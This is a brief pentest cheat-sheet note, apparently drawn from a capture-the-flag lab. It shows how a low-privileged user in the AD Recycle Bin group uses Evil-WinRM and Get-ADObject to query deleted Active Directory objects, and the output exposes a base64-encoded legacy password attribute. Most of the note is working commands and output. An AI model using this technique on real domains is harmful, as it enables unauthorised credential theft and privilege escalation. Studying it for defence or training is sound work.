AD Recycle Bin

windows, ad, pivot, privesc

Overview #

Attacker can retrieve juicy information from deleted AD Objects if he had gained access to a low-privileged user that has access in deleted AD objects.

Environment Setup and Requirements #

Steps #

*Evil-WinRM* PS C:\users\arksvc> whoami /all | findstr /i recycle
CASCADE\AD Recycle Bin                      Alias            S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
*Evil-WinRM* PS C:\users\arksvc> 
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
45689883479503
*Evil-WinRM* PS C:\users> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * | findstr cascadeLegacyPwd
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
*Evil-WinRM* PS C:\users> 

References #